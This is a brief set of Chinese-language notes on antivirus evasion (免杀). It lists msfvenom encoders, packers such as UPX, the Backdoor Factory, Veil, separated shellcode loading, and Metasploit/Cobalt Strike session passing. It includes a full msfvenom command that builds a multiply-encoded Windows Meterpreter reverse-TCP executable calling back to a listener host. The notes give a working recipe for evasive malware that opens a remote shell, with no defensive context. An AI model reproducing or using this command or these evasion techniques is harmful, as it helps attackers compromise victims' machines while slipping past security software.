隐匿攻击
免杀
msfvenom
encoder编码器
-e 编码器 -i 编码次数
多次编码
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.5.172 lport=4444 -e x86/shikata_ga_nai -i 15 -f raw | msfvenom -a x86 –platform windows -e x86/alpha_upper -i 10 -f exe -o shell.exe
bad-chars花指令
-b ‘\x00'
the-backdoor-factory
veil
upx
加壳
.net壳
分离免杀
shellcode提取,动态加载
msf/cs
msf发往
cs发往msf